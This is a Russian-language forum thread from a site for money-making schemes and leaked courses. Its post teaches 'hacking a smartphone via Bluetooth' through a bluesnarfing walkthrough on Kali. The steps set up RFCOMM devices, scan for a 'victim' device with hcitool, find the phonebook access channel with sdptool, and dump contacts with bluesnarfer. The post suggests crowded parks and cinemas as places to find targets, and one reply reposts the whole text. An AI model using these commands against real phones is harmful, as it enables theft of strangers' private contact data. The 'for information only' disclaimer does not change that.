• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом смартфона по Bluetooth

Miron_T31

Местный
Сообщения
195
Реакции
160
0 руб.
АВТОР ДАННОЙ СТАТЬИ НЕ НЕСЕТ ОТВЕТСТВЕННОСТЬ ЗА ДЕЙСТВИЯ ПРОЧИТАВШИХ.СТАТЬЯ НЕСЕТ ТОЛЬКО ОЗНАКОМИТЕЛЬНЫЙ ХАРАКТЕР!!!
В наши дни Bluetooth поддерживается огромным количеством устройств, что делает его достаточно привлекательным для взлома. Хотя эта технология имеет достаточно ограниченный радиус действия — около десяти метров, — нельзя списывать ее со счетов. В местах большого скопления людей, скажем,в парках или кинотеатрах, вы никогда не испытаете недостатка в целях
Так же, как и Wi-Fi, Bluetooth имеет ряд уязвимостей, которые позволяют атакующему получить несанкционированный доступ к информации и даже взять устройство под свой контроль. Вот только некоторые возможности:

1.Получение копии календаря и записной книжки;

2.Удаленная активация камеры и микрофона;

3.Превращение телефона в прослушивающее устройство;

4.Совершение звонков и использование устройства для доступа в Интернет;

5.Заражение устройства вирусом.
Вот пример того, как можно получить данные с телефона жертвы.
Вначале проведем подготовку:
root@kali:~# mkdir -p /dev/bluetooth/rfcomm
root@kali:~# mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
root@kali:~# rfkill unblock all
root@kali:~# hciconfig hci0 up
Проверим локальное устройство и выберем жертву:
root@kali:~# hciconfig hci0
hci0: Type: BR/EDR Bus: USB
BD Address: 40:2C:F4:C5:08:80 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:1022 acl:0 sco:0 events:46 errors:0
TX bytes:678 acl:0 sco:0 commands:46 errors:0
root@kali:~# hcitool scan
Scanning ...
с Samsung Tab 4
Изучим список доступных сервисов на устройстве жертвы. Также определим номер канала, к которому мы впоследствии подключимся. Это будет последняя цифра в строке Channel/Port.
root@kali:~# sdptool browse --tree --l2cap F8:95:C7:72:10:E2
Browsing F6:32:B0:71:4D:D8...
Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x10000
Attribute Identifier : 0x1 — ServiceClassIDList
Data Sequence
UUID16 : 0x1801
Attribute Identifier : 0x4 — ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 — L2CAP
Channel/Port (Integer) : 0x1f
Data Sequence
UUID16 : 0x0007
...
Browsing F6:32:B0:71:4D:D8...
Service Search failed: Invalid argument
Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x1000b
Attribute Identifier : 0x1 — ServiceClassIDList
Data Sequence
UUID16 : 0x112f — Phonebook Access (PBAP) — PSE
Attribute Identifier : 0x4 — ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 — L2CAP
Data Sequence
UUID16 : 0x0003 — RFCOMM
Channel/Port (Integer) : 0x13
Data Sequence
UUID16 : 0x0008 — OBEX
Attribute Identifier : 0x5 — BrowseGroupList
Data Sequence
UUID16 : 0x1002 — PublicBrowseGroup
Attribute Identifier : 0x9 — BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1130 — Phonebook Access (PBAP)
Version (Integer) : 0x101
Attribute Identifier : 0x100
Data : 4f 42 45 58 20 50 68 6f 6e 65 62 6f 6f 6b 20 41 63 63 65 73 73 20 53 65 72 76 65 72 00 00
Attribute Identifier : 0x314 — SupportedRepositories
Integer : 0x1
...
Теперь скопируем первые 100 записей из телефонной книги в файл:
root@kali:~# bluesnarfer -r 1-10 -C 3 -b F6:64:B0:71:1D:D2 > /root/p_book.txt
АВТОР ДАННОЙ СТАТЬИ НЕ НЕСЕТ ОТВЕТСТВЕННОСТЬ ЗА ДЕЙСТВИЯ ПРОЧИТАВШИХ.СТАТЬЯ НЕСЕТ ТОЛЬКО ОЗНАКОМИТЕЛЬНЫЙ ХАРАКТЕР!!!И да, все MAC- адреса я поменял на липовые и названия устройства тоже)))
 

Anildail

Участник
Сообщения
68
Реакции
31
0 руб.
АВТОР ДАННОЙ СТАТЬИ НЕ НЕСЕТ ОТВЕТСТВЕННОСТЬ ЗА ДЕЙСТВИЯ ПРОЧИТАВШИХ.СТАТЬЯ НЕСЕТ ТОЛЬКО ОЗНАКОМИТЕЛЬНЫЙ ХАРАКТЕР!!!
В наши дни Bluetooth поддерживается огромным количеством устройств, что делает его достаточно привлекательным для взлома. Хотя эта технология имеет достаточно ограниченный радиус действия — около десяти метров, — нельзя списывать ее со счетов. В местах большого скопления людей, скажем,в парках или кинотеатрах, вы никогда не испытаете недостатка в целях
Так же, как и Wi-Fi, Bluetooth имеет ряд уязвимостей, которые позволяют атакующему получить несанкционированный доступ к информации и даже взять устройство под свой контроль. Вот только некоторые возможности:

1.Получение копии календаря и записной книжки;

2.Удаленная активация камеры и микрофона;

3.Превращение телефона в прослушивающее устройство;

4.Совершение звонков и использование устройства для доступа в Интернет;


5.Заражение устройства вирусом.
Вот пример того, как можно получить данные с телефона жертвы.
Вначале проведем подготовку:
root@kali:~# mkdir -p /dev/bluetooth/rfcomm
root@kali:~# mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
root@kali:~# rfkill unblock all
root@kali:~# hciconfig hci0 up
Проверим локальное устройство и выберем жертву:
root@kali:~# hciconfig hci0
hci0: Type: BR/EDR Bus: USB
BD Address: 40:2C:F4:C5:08:80 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:1022 acl:0 sco:0 events:46 errors:0
TX bytes:678 acl:0 sco:0 commands:46 errors:0
root@kali:~# hcitool scan
Scanning ...
с Samsung Tab 4
Изучим список доступных сервисов на устройстве жертвы. Также определим номер канала, к которому мы впоследствии подключимся. Это будет последняя цифра в строке Channel/Port.
root@kali:~# sdptool browse --tree --l2cap F8:95:C7:72:10:E2
Browsing F6:32:B0:71:4D:D8...
Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x10000
Attribute Identifier : 0x1 — ServiceClassIDList
Data Sequence
UUID16 : 0x1801
Attribute Identifier : 0x4 — ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 — L2CAP
Channel/Port (Integer) : 0x1f
Data Sequence
UUID16 : 0x0007
...
Browsing F6:32:B0:71:4D:D8...
Service Search failed: Invalid argument
Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x1000b
Attribute Identifier : 0x1 — ServiceClassIDList
Data Sequence
UUID16 : 0x112f — Phonebook Access (PBAP) — PSE
Attribute Identifier : 0x4 — ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 — L2CAP
Data Sequence
UUID16 : 0x0003 — RFCOMM
Channel/Port (Integer) : 0x13
Data Sequence
UUID16 : 0x0008 — OBEX
Attribute Identifier : 0x5 — BrowseGroupList
Data Sequence
UUID16 : 0x1002 — PublicBrowseGroup
Attribute Identifier : 0x9 — BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1130 — Phonebook Access (PBAP)
Version (Integer) : 0x101
Attribute Identifier : 0x100
Data : 4f 42 45 58 20 50 68 6f 6e 65 62 6f 6f 6b 20 41 63 63 65 73 73 20 53 65 72 76 65 72 00 00
Attribute Identifier : 0x314 — SupportedRepositories
Integer : 0x1
...
Теперь скопируем первые 100 записей из телефонной книги в файл:
root@kali:~# bluesnarfer -r 1-10 -C 3 -b F6:64:B0:71:1D:D2 > /root/p_book.txt
АВТОР ДАННОЙ СТАТЬИ НЕ НЕСЕТ ОТВЕТСТВЕННОСТЬ ЗА ДЕЙСТВИЯ ПРОЧИТАВШИХ.СТАТЬЯ НЕСЕТ ТОЛЬКО ОЗНАКОМИТЕЛЬНЫЙ ХАРАКТЕР!!!И да, все MAC- адреса я поменял на липовые и названия устройства тоже)))
Спасибо правдо уязвимость давно известная но серовно спасибо.
 

Jogo

Новичок
Сообщения
10
Реакции
0
0 руб.
эм......а как зайти в подготовку? что нужно? какая прога и тд
я не до конца все понял
 

Velizar

Местный
Сообщения
109
Реакции
94
0 руб.
>какая прога
>root@kali
>прога
))))))))))))))))))
Не прога как я понял через протокол RFCOMM идет конект.Эмулирует кабельное соединение.другими словами тел думает что подключен к компу через кабель.Но в роде нужно быть подключенным к устройству тоесть сопряжение либо какая то уязвимость в протоколе позволяет произвести сопряжение без подтверждений.
 

Miron_T31

Местный
Сообщения
195
Реакции
160
0 руб.
Не прога как я понял через протокол RFCOMM идет конект.Эмулирует кабельное соединение.другими словами тел думает что подключен к компу через кабель.Но в роде нужно быть подключенным к устройству тоесть сопряжение либо какая то уязвимость в протоколе позволяет произвести сопряжение без подтверждений.
:scream:o_O
 
Сверху Снизу